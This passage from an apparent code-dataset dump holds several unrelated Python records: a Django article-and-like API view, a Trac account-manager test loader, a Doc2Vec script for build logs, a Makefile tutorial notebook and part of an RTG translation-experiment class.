found'\n        return Response(ret)\n\n    def retrieve(self, request, *args, **kwargs):\n        ret = {'code': 1000, 'data': None}\n        try:\n            pk = kwargs.get('pk')\n            obj = Article.objects.filter(pk=pk).first()\n            ser = ArticleDetailViewSetSerializers(instance=obj, many=False)\n            ret['data'] = ser.data\n        except Exception as e:\n            ret['code'] = 1001\n            ret['error'] = 'Resource not found'\n        return Response(ret)\n\n\nclass AgreeView(ViewSetMixin, APIView):\n\n    def post(self, request, *args, **kwargs):\n        \"\"\"\n        Like an article\n        :param request:\n        :param args:\n        :param kwargs:\n        :return:\n        \"\"\"\n        ret = {'code': 1000, 'data': None}\n        try:\n            pk = kwargs.get('pk')\n            # Option 1: read, increment and save the like count\n            obj = Article.objects.filter(id=pk).first()\n            obj.agree_num = obj.agree_num + 1\n            obj.save()\n            # Option 2: update the like count in the database\n            # F updates a database field; Q builds complex query conditions\n            # from django.db.models import F,Q\n            # v = Article.objects.filter(id=pk).update(agree_num=F(\"agree_num\") + 1)\n            # print(v)\n            ret['data'] = obj.agree_num\n        except Exception as e:\n            ret['code'] = 1001\n            ret['error'] = 'Like failed'\n        return Response(ret)\n","sub_path":"api/views/course/newspapers.py","file_name":"newspapers.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118537508","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2005 Matthew Good \n# Copyright (C) 2015 Steffen Hoffmann \n# All rights reserved.\n#\n# This software is licensed as described in the file COPYING, which\n# you should have received as part of this distribution.\n#\n# Author: Matthew Good \n\nimport sys\nimport unittest\n\n_twill_required = 'Twill>=2'\ntry:\n    import twill\nexcept ImportError:\n    twill = None\n    INCLUDE_FUNCTIONAL_TESTS = False\nelse:\n    # XXX Avoid tracenv log writing to stdout via twill.log\n    if hasattr(twill, 'log') and hasattr(twill, 'handler'):\n        twill.log.removeHandler(twill.handler)\n    import pkg_resources\n    try:\n        pkg_resources.require(_twill_required)\n    except:\n        INCLUDE_FUNCTIONAL_TESTS = False\n        twill = None\n    else:\n        INCLUDE_FUNCTIONAL_TESTS = True\n\n\ndef test_suite():\n    from . import (admin, api, db, guard, htfile, model, pwhash, register,\n                   svnserve, util)\n    from ..opt import tests as opt_tests\n\n    suite = unittest.TestSuite()\n    for mod in (admin, api, db, guard, htfile, model, pwhash, register,\n                svnserve, util, opt_tests):\n        suite.addTest(mod.test_suite())\n\n    if INCLUDE_FUNCTIONAL_TESTS:\n        from . 
import functional\n        suite.addTest(functional.test_suite())\n    elif not twill:\n        sys.stderr.write('SKIP: functional tests (%s unavailable)\\n' %\n                         _twill_required)\n    else:\n        sys.stderr.write('SKIP: functional tests\\n')\n    return suite\n\n\nif __name__ == '__main__':\n    if '--skip-functional-tests' in sys.argv:\n        sys.argv.remove('--skip-functional-tests')\n        INCLUDE_FUNCTIONAL_TESTS = False\n    unittest.main(defaultTest='test_suite')\n","sub_path":"acct_mgr/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523049455","text":"from os import listdir\nfrom collections import namedtuple, OrderedDict\nimport multiprocessing\n\nimport numpy as np\nfrom nltk.tokenize import sent_tokenize\nfrom smart_open import smart_open\nimport gensim\nimport gensim.models.doc2vec\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\n\n\n# Collect the build log files and sentence-tokenize them\ndocs = [f for f in listdir('/home/sunagara/PycharmProjects/Build_Logs_Aggregation/Build-Logs-Aggregation/logs/') if f.endswith('.txt')]\nsent_tokenize_list = []\nfor doc in docs:\n    with open('/home/sunagara/PycharmProjects/Build_Logs_Aggregation/Build-Logs-Aggregation/logs/' + doc) as data1:\n        sent_tokenize_list.append(sent_tokenize(data1.read()))\nprint(sent_tokenize_list)\n# Pass a tokenized version of the log file to the model\n\nSentimentDocument = namedtuple('SentimentDocument', 'words tags split sentiment')\n\nalldocs = []\nwith smart_open('/home/sunagara/PycharmProjects/Build_Logs_Aggregation/Build-Logs-Aggregation/logs/log1.txt', 'rb', encoding='utf-8') as alldata:\n    for line_no, line in enumerate(alldata):\n        tokens = gensim.utils.to_unicode(line).split()\n        words = tokens[1:]\n        # split the data into training and testing\n        tags = [line_no]  # 'tags = [tokens[0]]' would also work at extra memory cost\n        split = ['train', 'test', 'extra', 'extra'][line_no//25000]  # 25k train, 25k test, 25k extra\n        sentiment = [1.0, 0.0, 1.0, 0.0, None, None, None, None][line_no//12500]  # [12.5K pos, 12.5K neg]*2 then unknown\n        alldocs.append(SentimentDocument(words, tags, split, sentiment))\n\n# Split the labelled docs into train and test sets\ntrain_docs = [doc for doc in alldocs if doc.split == 'train']\ntest_docs = [doc for doc in alldocs if doc.split == 'test']\n\nprint('%d docs: %d train-sentiment, %d test-sentiment' % (len(alldocs), len(train_docs), len(test_docs)))\n\n# Reducing CPU time by assigning these parameters to model training\ncores = multiprocessing.cpu_count()\nassert gensim.models.doc2vec.FAST_VERSION > -1, \"This will be painfully slow otherwise\"\n\n# Hyper tuning the models with different parameters and sending the train and test data to them for identifying if all combinations work to give accurate results\nsimple_models = [\n    # PV-DBOW plain\n    Doc2Vec(dm=0, vector_size=100, negative=5, hs=0, min_count=2, sample=0,\n            epochs=20, workers=cores),\n    # PV-DM w/ default averaging; a higher starting alpha may improve CBOW/PV-DM modes\n    Doc2Vec(dm=1, vector_size=100, window=10, negative=5, hs=0, min_count=2, sample=0,\n            epochs=20, workers=cores, alpha=0.05, comment='alpha=0.05'),\n    # PV-DM w/ concatenation - big, slow, experimental mode\n    # window=5 (both sides) approximates paper's apparent 10-word total window size\n    Doc2Vec(dm=1, dm_concat=1, 
vector_size=100, window=5, negative=5, hs=0, min_count=2, sample=0,\n            epochs=20, workers=cores),\n]\n\n# supply data to all the above models and train them\nfor model in simple_models:\n    model.build_vocab(alldocs)\n    print(\"%s vocabulary scanned & state initialized\" % model)\n    # without an explicit train() call the document vectors would stay at their random initialization\n    model.train(alldocs, total_examples=model.corpus_count, epochs=model.epochs)\n\nmodels_by_name = OrderedDict((str(model), model) for model in simple_models)\n\ndoc_id = np.random.randint(simple_models[0].docvecs.count)  # Pick random doc; re-run cell for more examples\nprint('for doc %d...' % doc_id)\nfor model in simple_models:\n    inferred_docvec = model.infer_vector(alldocs[doc_id].words)\n    print('%s:\\n %s' % (model, model.docvecs.most_similar([inferred_docvec], topn=5)))\n\n# infer_vector re-estimates a vector for the chosen document; most_similar then ranks the training documents by cosine similarity and lists the top 5 matches\n","sub_path":"Doc2Vecimplementation.py","file_name":"Doc2Vecimplementation.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"66403723","text":"\n# coding: utf-8\n\n# ## Learning how to make a Makefile\n# \n# Adapted from [swcarpentry/make-novice repository](https://github.com/swcarpentry/make-novice).\n# \n# ### Make’s fundamental concepts are common across build tools.\n# \n# > [GNU Make](http://www.gnu.org/software/make/) is a free, fast, well-documented, and very popular Make implementation. From now on, we will focus on it, and when we say Make, we mean GNU Make.\n# \n# ### A tutorial named Makefiles—part 2 of the tutorial.\n# \n# Cells that follow are the result of following this [Makefiles tutorial](http://swcarpentry.github.io/make-novice/02-makefiles/).\n# \n# #### Other blog posts\n# \n# * [Tutorial begins: Introduction]({filename}./makefile_tutorial_0.ipynb)\n# \n# NB: I have adapted the tutorial so that the steps take place in this Jupyter notebook so that the notebook can be transpiled into a Pelican blog post using a [danielfrg/pelican-ipynb Pelican plugin](https://github.com/danielfrg/pelican-ipynb). 
Some of the code is what is necessary to display output in the notebook and therefore the blog post.\n\n# *Some Jupyter notebook housekeeping to set up some variables with path references.*\n\n# In[1]:\n\nimport os\n\n\n# In[150]:\n\nfrom IPython.core.display import Image, display\n\n\n# In[2]:\n\n(\n TAB_CHAR,\n) = (\n '\\t',\n)\n\n\n# In[3]:\n\nhome = os.path.expanduser('~')\n\n\n# *`repo_path` is the path to a clone of [swcarpentry/make-novice](https://github.com/swcarpentry/make-novice)*\n\n# In[4]:\n\nrepo_path = os.path.join(\n home, \n 'Dropbox/spikes/make-novice',\n)\n\n\n# In[5]:\n\nassert os.path.exists(repo_path)\n\n\n# *`paths` are the paths to child directories in a clone of [swcarpentry/make-novice](https://github.com/swcarpentry/make-novice)*\n\n# In[6]:\n\npaths = (\n 'code',\n 'data',\n)\npaths = (\n code,\n data,\n) = [os.path.join(repo_path, path) for path in paths]\nassert all(os.path.exists(path) for path in paths)\n\n\n# In[20]:\n\nformat_context = dict(zip(\n ('repo_path', 'data', 'code', 'tab',), \n (repo_path, data, code, TAB_CHAR))\n)\n\n\n# #### Begin tutorial.\n# \n# > Create a file, called Makefile, with the following content:\n\n# In[107]:\n\nmakefile_contents_0 = \"\"\"# Count words.\n{repo_path}/isles.dat : {data}/books/isles.txt\n{tab}python {code}/wordcount.py {data}/books/isles.txt {repo_path}/isles.dat\n\"\"\".format(**format_context)\n\n\n# *Using the shell to create Makefile with contents the value of Python variable `makefile_contents`.*\n\n# In[108]:\n\nget_ipython().system('printf \"$makefile_contents_0\" > Makefile')\n\n\n# > This is a build file, which for Make is called a Makefile - a file executed by Make. Note how it resembles one of the lines from our shell script.\n\n# ```bash\n# # Count words.\n# /home/dmmmd/Dropbox/spikes/make-novice/isles.dat : /home/dmmmd/Dropbox/spikes/make-novice/data/books/isles.txt\n# \tpython /home/dmmmd/Dropbox/spikes/make-novice/code/wordcount.py /home/dmmmd/Dropbox/spikes/make-novice/data/books/isles.txt /home/dmmmd/Dropbox/spikes/make-novice/isles.dat\n# ```\n\n# > Let us go through each line in turn:\n# \n# > * \\# denotes a comment. Any text from # to the end of the line is ignored by Make.\n# * isles.dat is a target, a file to be created, or built.\n# * books/isles.txt is a dependency, a file that is needed to build or update the target. Targets can have zero or more dependencies.\n# * A colon, :, separates targets from dependencies.\n# * python wordcount.py books/isles.txt isles.dat is an action, a command to run to build or update the target using the dependencies. Targets can have zero or more actions. These actions form a recipe to build the target from its dependencies and can be considered to be a shell script.\n# * Actions are indented using a single TAB character, not 8 spaces. This is a legacy of Make’s 1970’s origins. If the difference between spaces and a TAB character isn’t obvious in your editor, try moving your cursor from one side of the TAB to the other. 
It should jump four or more spaces.\n# * Together, the target, dependencies, and actions form a rule.\n\n# > Let’s first make sure we start from scratch and delete the .dat and .png files we created earlier\n\n# In[38]:\n\nget_ipython().system('rm $repo_path/*.dat $repo_path/*.png')\n\n\n# > By default, Make looks for a Makefile, called Makefile, and we can run Make as follows\n\n# In[39]:\n\nget_ipython().system('make')\n# By default, Make prints out the actions it executes:\n\n\n# > Let’s see if we got what we expected\n\n# In[40]:\n\nget_ipython().system('head -5 $repo_path/isles.dat')\n\n\n# > We don’t have to call our Makefile Makefile. However, if we call it something else we need to tell Make where to find it. This we can do using the -f flag. For example, if our Makefile is named MyOtherMakefile:\n\n# In[109]:\n\nget_ipython().system('printf \"$makefile_contents_0\" > MyOtherMakeFile.mk')\n\n\n# In[110]:\n\nget_ipython().system('make -f MyOtherMakeFile.mk')\n\n\n# > This is because our target, isles.dat, has now been created, and Make will not create it again. To see how this works, let’s pretend to update one of the text files. Rather than opening the file in an editor, we can use the shell touch command to update its timestamp (which would happen if we did edit the file)\n\n# In[57]:\n\nget_ipython().system('touch $data/books/isles.txt')\n\n\n# > If we compare the timestamps of books/isles.txt and isles.dat,\n\n# In[58]:\n\nget_ipython().system('ls -l $data/books/isles.txt $repo_path/isles.dat')\n# then we see that isles.dat, the target, is now older than books/isles.txt, its dependency\n\n\n# > If we run Make again,\n\n# In[59]:\n\nget_ipython().system('make')\n#then it recreates isles.dat\n\n\n# > When it is asked to build a target, Make checks the ‘last modification time’ of both the target and its dependencies. If any dependency has been updated since the target, then the actions are re-run to update the target. Using this approach, Make knows to only rebuild the files that, either directly or indirectly, depend on the file that changed. This is called an incremental build.\n\n# > up to date means that the Makefile has a rule for the file and the file is up to date whereas Nothing to be done means that the file exists but the Makefile has no rule for it.\n\n# In[61]:\n\nget_ipython().system('make $code/wordcount.py')\n\n\n# > By explicitly recording the inputs to and outputs from steps in our analysis and the dependencies between files, Makefiles act as a type of documentation, reducing the number of things we have to remember.\n\n# > Let’s add another rule to the end of Makefile:\n\n# In[113]:\n\nmakefile_contents_1 = \"\"\"\n{repo_path}/abyss.dat : {data}/books/abyss.txt\n{tab}python {code}/wordcount.py {data}/books/abyss.txt {repo_path}/abyss.dat\n\"\"\".format(**format_context)\nmakefile_contents = ''.join((makefile_contents_0, makefile_contents_1))\n\n\n# In[114]:\n\n# append makefile_contents to Makefile\nget_ipython().system('printf \"$makefile_contents\" > Makefile')\n\n\n# In[76]:\n\nget_ipython().system('make')\n\n\n# > Nothing happens because Make attempts to build the first target it finds in the Makefile, the default target, which is isles.dat which is already up-to-date. We need to explicitly tell Make we want to build abyss.dat:\n\n# In[79]:\n\nget_ipython().system('make $repo_path/abyss.dat')\n\n\n# > We may want to remove all our data files so we can explicitly recreate them all. We can introduce a new target, and associated rule, to do this. 
We will call it clean, as this is a common name for rules that delete auto-generated files, like our .dat files:\n\n# In[121]:\n\nmakefile_contents_2 = \"\"\"\n{repo_path}/clean:\n{tab}rm -f {repo_path}/*.dat\n\"\"\".format(**format_context)\nmakefile_contents = ''.join((makefile_contents_0, makefile_contents_1, makefile_contents_2))\n\n\n# In[122]:\n\n# add makefile_contents to Makefile\nget_ipython().system('printf \"$makefile_contents\" > Makefile')\n\n\n# > This is an example of a rule that has no dependencies. clean has no dependencies on any .dat file as it makes no sense to create these just to remove them. We just want to remove the data files whether or not they exist. If we run Make and specify this target,\n# \n# \n\n# In[123]:\n\nget_ipython().system('make clean')\n\n\n# *All .dat files are removed!*\n\n# > There is no actual thing built called clean. Rather, it is a short-hand that we can use to execute a useful sequence of actions. Such targets, though very useful, can lead to problems.\n# \n# > \n# \n# > For example, let us recreate our data files, create a directory called clean, then run Make:\n\n# In[124]:\n\nget_ipython().system('make \"$repo_path\"/isles.dat \"$repo_path\"/abyss.dat')\nget_ipython().system('mkdir \"$repo_path\"/clean')\n\n\n# In[125]:\n\nget_ipython().system('make \"$repo_path\"/clean')\n\n\n# > Make finds a file (or directory) called clean and, as its clean rule has no dependencies, assumes that clean has been built and is up-to-date and so does not execute the rule’s actions. As we are using clean as a short-hand, we need to tell Make to always execute this rule if we run make clean, by telling Make that this is a phony target, that it does not build anything. This we do by marking the target as .PHONY:\n\n# In[142]:\n\nmakefile_contents_phony_clean = \"\"\"\n.PHONY : clean\nclean:\n{tab}rm -f {repo_path}/*.dat\n\"\"\".format(**format_context)\nmakefile_contents = ''.join((makefile_contents_0, makefile_contents_1, makefile_contents_phony_clean))\n\n\n# In[143]:\n\n# add makefile_contents to Makefile\nget_ipython().system('printf \"$makefile_contents\" > Makefile')\n\n\n# *Now get expected result.*\n\n# In[145]:\n\nget_ipython().system('make clean')\n\n\n# > We can add a similar command to create all the data files. 
We can put this at the top of our Makefile so that it is the default target, which is executed by default if no target is given to the make command:\n# \n# \n\n# In[146]:\n\nmakefile_contents_create_all_data = \"\"\"\n.PHONY : dats\ndats : {repo_path}/isles.dat {repo_path}/abyss.dat\n\"\"\".format(**format_context)\nmakefile_contents = ''.join((\n makefile_contents_0, \n makefile_contents_1, \n makefile_contents_phony_clean, \n makefile_contents_create_all_data,\n))\n\n\n# In[147]:\n\n# add makefile_contents to Makefile\nget_ipython().system('printf \"$makefile_contents\" > Makefile')\n\n\n# In[148]:\n\nget_ipython().system('make dats')\n\n\n# In[149]:\n\nget_ipython().system('make dats')\n\n\n# > The following figure shows a graph of the dependencies embodied within our Makefile, involved in building the dats target\n\n# In[151]:\n\ndisplay(Image('http://swcarpentry.github.io/make-novice/fig/02-makefile.png', unconfined=True))\n\n","sub_path":"content/posts/makefile-tutorial/makefile_tutorial_1.py","file_name":"makefile_tutorial_1.py","file_ext":"py","file_size_in_byte":10449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"318248699","text":"import copy\nimport os\nimport random\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\nfrom functools import partial\nfrom typing import Optional, Dict, List, Tuple, Union, Any\nimport time\n\nimport numpy as np\nimport torch\n\nfrom rtg import log, yaml\nfrom rtg.data.dataset import (TSVData, BatchIterable, LoopingIterable, SqliteFile, GenerativeBatchIterable)\nfrom rtg.data.codec import Field, SPField, NLField, PretrainMatchField\nfrom rtg.utils import IO, line_count\n\nseeded = False\n\n\ndef load_conf(inp: Union[str, Path]):\n with IO.reader(inp) as fh:\n return yaml.load(fh)\n\n\nclass BaseExperiment:\n\n def __init__(self, work_dir: Union[str, Path], read_only=False,\n config: Union[str, Path, Optional[Dict[str, Any]]] = None):\n if type(work_dir) is str:\n work_dir = Path(work_dir)\n\n log.info(f\"Initializing an experiment. 
Directory = {work_dir}\")\n        self.read_only = read_only\n        self.work_dir = work_dir\n        self.log_dir = work_dir / 'logs'\n        self.log_file = self.log_dir / 'rtg.log'\n        self.data_dir = work_dir / 'data'\n        self.model_dir = work_dir / 'models'\n        self._config_file = work_dir / 'conf.yml'\n        if isinstance(config, str) or isinstance(config, Path):\n            config = load_conf(config)\n        self.config = config if config else load_conf(self._config_file)\n        self.codec_name = self.config.get('prep', {}).get('codec_lib', 'sentpiece')  # with default\n        codec_libs = {'sentpiece': SPField,\n                      'nlcodec': NLField,\n                      'pretrainmatch': PretrainMatchField}\n        self.codec_supports_multiproc = self.codec_name in {'nlcodec'}\n        assert self.codec_name in codec_libs, f'{self.codec_name} is not in {codec_libs.keys()}'\n        log.info(f\"codec lib = {self.codec_name}\")\n        self.Field = codec_libs[self.codec_name]\n\n        self._shared_field_file = self.data_dir / f'{self.codec_name}.shared.model'\n        self._prepared_flag = self.work_dir / '_PREPARED'\n        self._trained_flag = self.work_dir / '_TRAINED'\n\n        self.train_file = self.data_dir / 'train.tsv.gz'\n        self.train_db = self.data_dir / 'train.db'\n        self.train_db_tmp = self.data_dir / 'train.db.tmp'\n        self.finetune_file = self.data_dir / 'finetune.db'\n        self.valid_file = self.data_dir / 'valid.tsv.gz'\n        self.combo_file = self.data_dir / 'combo.tsv.gz'\n        # a set of samples to watch the progress qualitatively\n        self.samples_file = self.data_dir / 'samples.tsv.gz'\n\n        if not read_only:\n            for _dir in [self.model_dir, self.data_dir, self.log_dir]:\n                if not _dir.exists():\n                    _dir.mkdir(parents=True)\n\n        assert self.config, 'Looks like the config is empty or invalid'\n        self.maybe_seed()\n\n        self.shared_field = self.Field(str(self._shared_field_file)) \\\n            if self._shared_field_file.exists() else None\n\n    def maybe_seed(self):\n        global seeded\n        if not seeded and 'seed' in self.config:\n            seed = self.config['seed']\n            log.info(f\"Manually seeding the RNG with {seed}\")\n            random.seed(seed)\n            torch.manual_seed(seed)\n            np.random.seed(seed)\n            if torch.cuda.is_available():\n                torch.backends.cudnn.deterministic = True\n                torch.backends.cudnn.benchmark = False\n            seeded = True\n        else:\n            log.info(\"No manual seed! Letting the RNGs do their stuff\")\n\n    def store_config(self):\n        yaml.dump(self.config, stream=self._config_file)\n\n    @property\n    def model_type(self) -> Optional[str]:\n        return self.config.get('model_type')\n\n    @model_type.setter\n    def model_type(self, mod_type: str):\n        self.config['model_type'] = mod_type\n\n    def has_prepared(self):\n        return self._prepared_flag.exists()\n\n    def has_trained(self):\n        return self._trained_flag.exists()\n\n    def store_model(self, optimizer_step: int, model, train_score: float, val_score: float, keep: int,\n                    prefix='model', keeper_sort='step'):\n        \"\"\"\n        saves model to a given path\n        :param optimizer_step: optimizer step of the model\n        :param model: model object itself\n        :param train_score: score of model on training split\n        :param val_score: score of model on validation split\n        :param keep: number of good models to keep, bad models will be deleted\n        :param prefix: prefix to store model. 
default is \"model\"\n :param keeper_sort: criteria for choosing the old or bad models for deletion.\n Choices: {'total_score', 'step'}\n :return:\n \"\"\"\n # TODO: improve this by skipping the model save if the model is not good enough to be saved\n if self.read_only:\n log.warning(\"Ignoring the store request; experiment is readonly\")\n return\n name = f'{prefix}_{optimizer_step:03d}_{train_score:.6f}_{val_score:.6f}.pkl'\n path = self.model_dir / name\n log.info(f\"Saving optimizer step {optimizer_step} to {path}\")\n torch.save(model, str(path))\n\n del_models = []\n if keeper_sort == 'total_score':\n del_models = self.list_models(sort='total_score', desc=False)[keep:]\n elif keeper_sort == 'step':\n del_models = self.list_models(sort='step', desc=True)[keep:]\n else:\n Exception(f'Sort criteria{keeper_sort} not understood')\n for d_model in del_models:\n log.info(f\"Deleting model {d_model} . Keep={keep}, sort={keeper_sort}\")\n os.remove(str(d_model))\n\n with IO.writer(os.path.join(self.model_dir, 'scores.tsv'), append=True) as f:\n cols = [str(optimizer_step), datetime.now().isoformat(), name, f'{train_score:g}',\n f'{val_score:g}']\n f.write('\\t'.join(cols) + '\\n')\n\n @staticmethod\n def _path_to_validn_score(path):\n parts = str(path.name).replace('.pkl', '').split('_')\n valid_score = float(parts[-1])\n return valid_score\n\n @staticmethod\n def _path_to_total_score(path):\n parts = str(path.name).replace('.pkl', '').split('_')\n tot_score = float(parts[-2]) + float(parts[-1])\n return tot_score\n\n @staticmethod\n def _path_to_step_no(path):\n parts = str(path.name).replace('.pkl', '').split('_')\n step_no = int(parts[-3])\n return step_no\n\n def list_models(self, sort: str = 'step', desc: bool = True) -> List[Path]:\n \"\"\"\n Lists models in descending order of modification time\n :param sort: how to sort models ?\n - valid_score: sort based on score on validation set\n - total_score: sort based on validation_score + training_score\n - mtime: sort by modification time\n - step (default): sort by step number\n :param desc: True to sort in reverse (default); False to sort in ascending\n :return: list of model paths\n \"\"\"\n paths = list(self.model_dir.glob('model_*.pkl'))\n if not paths:\n paths = list(self.model_dir.glob('embeddings_*.gz'))\n sorters = {\n 'valid_score': self._path_to_validn_score,\n 'total_score': self._path_to_total_score,\n 'mtime': lambda p: p.stat().st_mtime,\n 'step': self._path_to_step_no\n }\n if sort not in sorters:\n raise Exception(f'Sort {sort} not supported. 
valid options: {sorters.keys()}')\n        return sorted(paths, key=sorters[sort], reverse=desc)\n\n    def _get_first_model(self, sort: str, desc: bool) -> Tuple[Optional[Path], int]:\n        \"\"\"\n        Gets the first model that matches the given sort criteria\n        :param sort: sort mechanism\n        :param desc: True for descending, False for ascending\n        :return: Tuple[Optional[Path], step_num:int]\n        \"\"\"\n        models = self.list_models(sort=sort, desc=desc)\n        if models:\n            name = models[0].name.replace('.pkl', '').replace('.txt.gz', '')\n            step, train_score, valid_score = name.split('_')[-3:]\n            return models[0], int(step)\n        else:\n            return None, 0\n\n    def get_best_known_model(self) -> Tuple[Optional[Path], int]:\n        \"\"\"Gets best known model (best on lowest scores on training and validation sets)\n        \"\"\"\n        return self._get_first_model(sort='total_score', desc=False)\n\n    def get_last_saved_model(self) -> Tuple[Optional[Path], int]:\n        return self._get_first_model(sort='step', desc=True)\n\n    @property\n    def model_args(self) -> Optional[Dict]:\n        \"\"\"\n        Gets args from file\n        :return: args if exists or None otherwise\n        \"\"\"\n        return self.config.get('model_args')\n\n    @model_args.setter\n    def model_args(self, model_args):\n        \"\"\"\n        set model args\n        \"\"\"\n        self.config['model_args'] = model_args\n\n    @property\n    def optim_args(self) -> Tuple[Optional[str], Dict]:\n        \"\"\"\n        Gets optimizer args from file\n        :return: optimizer args if exists or None otherwise\n        \"\"\"\n        opt_conf = self.config.get('optim')\n        if opt_conf:\n            return opt_conf.get('name'), opt_conf.get('args')\n        else:\n            return None, {}\n\n    @optim_args.setter\n    def optim_args(self, optim_args: Tuple[str, Dict]):\n        \"\"\"\n        set optimizer args\n        \"\"\"\n        name, args = optim_args\n        self.config['optim'].update({'name': name, 'args': args})\n\n    @property\n    def shared_vocab(self) -> Field:\n        return self.shared_field\n\n    @staticmethod\n    def get_first_found_file(paths: List[Path]):\n        \"\"\"returns the first file that is not None, and actually exists on disc;\n        If no file is valid, it returns None\"\"\"\n        for p in paths:\n            if p and p.exists():\n                return p\n        return None\n\n\nclass TranslationExperiment(BaseExperiment):\n\n    def __init__(self, work_dir: Union[str, Path], read_only=False,\n                 config: Union[str, Path, Optional[Dict[str, Any]]] = None):\n        super().__init__(work_dir, read_only=read_only, config=config)\n        self._src_field_file = self.data_dir / f'{self.codec_name}.src.model'\n        self._tgt_field_file = self.data_dir / f'{self.codec_name}.tgt.model'\n\n        self.emb_src_file = self.data_dir / 'emb_src.pt'\n        self.emb_tgt_file = self.data_dir / 'emb_tgt.pt'\n        self.ext_emb_src_file = self.data_dir / 'ext_emb_src.pt'  # external Embeddings\n        self.ext_emb_tgt_file = self.data_dir / 'ext_emb_tgt.pt'  # external Embeddings\n\n        self.reload_vocabs()\n\n        # Either shared field OR individual src and tgt fields\n        assert not (self.shared_field and self.src_field)\n        assert not (self.shared_field and self.tgt_field)\n        # both are set or both are unset\n        #assert (self.src_field is None) == (self.tgt_field is None)\n\n        self._unsupervised = self.model_type in {'binmt', 'rnnlm', 'tfmlm'}\n        if self._unsupervised:\n            self.mono_train_src = self.data_dir / 'mono.train.src.gz'\n            self.mono_train_tgt = self.data_dir / 'mono.train.tgt.gz'\n            self.mono_valid_src = self.data_dir / 'mono.valid.src.gz'\n            self.mono_valid_tgt = self.data_dir / 'mono.valid.tgt.gz'\n\n        self.parent_model_state = self.data_dir / 'parent_model_state.pt'\n\n    def reload_vocabs(self):\n        self.src_field, self.tgt_field, 
self.shared_field = [\n            self.Field(str(f)) if f.exists() else None for f in (\n                self._src_field_file, self._tgt_field_file, self._shared_field_file)]\n\n    def check_line_count(self, name, file1, file2):\n        count1 = line_count(file1)\n        count2 = line_count(file2)\n        if count1 == count2:\n            log.info(f\"Found {count1:,} parallel lines for {name}\")\n        else:\n            log.error(f\"Found line mismatch in {name}\")\n            raise Exception(f'{file1} has {count1:,} lines but {file2} has {count2:,} lines')\n\n    def pre_process_parallel(self, args: Dict[str, Any]):\n        # check if files are parallel\n        self.check_line_count('validation', args['valid_src'], args['valid_tgt'])\n        if 'spark' in self.config:\n            log.warning(f\"Spark backend detected: line count on training data is skipped\")\n        else:\n            log.warning(f\"Going to count lines. If this is a big dataset, it will take a long time\")\n            self.check_line_count('training', args['train_src'], args['train_tgt'])\n\n        xt_args = dict(no_split_toks=args.get('no_split_toks'),\n                       char_coverage=args.get('char_coverage', 0))\n        if args.get('shared_vocab'):  # shared vocab\n            corpus = [args[key] for key in ['train_src', 'train_tgt', 'mono_src', 'mono_tgt']\n                      if args.get(key)]\n            self.shared_field = self._make_vocab(\"shared\", self._shared_field_file, args['pieces'],\n                                                 args['max_types'], corpus=corpus, **xt_args)\n        else:  # separate vocabularies\n            src_corpus = [args[key] for key in ['train_src', 'mono_src'] if args.get(key)]\n            self.src_field = self._make_vocab(\"src\", self._src_field_file, args['pieces'],\n                                              args['max_src_types'], corpus=src_corpus, **xt_args)\n\n            # target vocabulary\n            tgt_corpus = [args[key] for key in ['train_tgt', 'mono_tgt'] if args.get(key)]\n            self.tgt_field = self._make_vocab(\"tgt\", self._tgt_field_file, args['pieces'],\n                                              args['max_tgt_types'], corpus=tgt_corpus, **xt_args)\n\n        train_file = self.train_db\n\n        self._pre_process_parallel('train_src', 'train_tgt', out_file=train_file, args=args,\n                                   line_check=False)\n        self._pre_process_parallel('valid_src', 'valid_tgt', out_file=self.valid_file, args=args,\n                                   line_check=False)\n\n        if args.get(\"finetune_src\") or args.get(\"finetune_tgt\"):\n            self._pre_process_parallel('finetune_src', 'finetune_tgt', self.finetune_file)\n\n        # get samples from validation set\n        n_samples = args.get('num_samples', 5)\n        space_tokr = lambda line: line.strip().split()\n        val_raw_recs = TSVData.read_raw_parallel_recs(\n            args['valid_src'], args['valid_tgt'], args['truncate'], args['src_len'],\n            args['tgt_len'], src_tokenizer=space_tokr, tgt_tokenizer=space_tokr)\n        val_raw_recs = list(val_raw_recs)\n        random.shuffle(val_raw_recs)\n        samples = val_raw_recs[:n_samples]\n        TSVData.write_parallel_recs(samples, self.samples_file)\n\n    def _make_vocab(self, name: str, vocab_file: Path, model_type: str, vocab_size: int,\n                    corpus: List, no_split_toks: List[str] = None, char_coverage=0) -> Field:\n        \"\"\"\n        Construct vocabulary file\n        :param name: name : src, tgt or shared -- for the sake of logging\n        :param vocab_file: where to save the vocab file\n        :param model_type: sentence piece model type\n        :param vocab_size: max types in vocab\n        :param corpus: as the name says, list of files from which the vocab should be learned\n        :param no_split_toks: tokens that need to be preserved from splitting, or added\n        :return:\n        \"\"\"\n        if vocab_file.exists():\n            log.info(f\"{vocab_file} exists. 
Skipping the {name} vocab creation\")\n            return self.Field(str(vocab_file))\n        flat_uniq_corpus = set()  # remove dupes, flatten the nested lists or sets\n        for i in corpus:\n            if isinstance(i, set) or isinstance(i, list):\n                flat_uniq_corpus.update(i)\n            else:\n                flat_uniq_corpus.add(i)\n\n        flat_uniq_corpus = list(flat_uniq_corpus)\n        log.info(f\"Going to build {name} vocab from files\")\n        return self.Field.train(model_type, vocab_size, str(vocab_file), flat_uniq_corpus,\n                                no_split_toks=no_split_toks, char_coverage=char_coverage)\n\n    def pre_process_mono(self, args):\n        xt_args = dict(no_split_toks=args.get('no_split_toks'),\n                       char_coverage=args.get('char_coverage', 0))\n\n        mono_files = [args[key] for key in ['mono_train_src', 'mono_train_tgt'] if key in args]\n        assert mono_files, \"At least one of 'mono_train_src', 'mono_train_tgt' should be set\"\n        log.info(f\"Found mono files: {mono_files}\")\n        if args.get('shared_vocab'):\n            self.shared_field = self._make_vocab(\"shared\", self._shared_field_file, args['pieces'],\n                                                 args['max_types'], corpus=mono_files, **xt_args)\n        else:  # separate vocabularies\n            if 'mono_train_src' in args:\n                self.src_field = 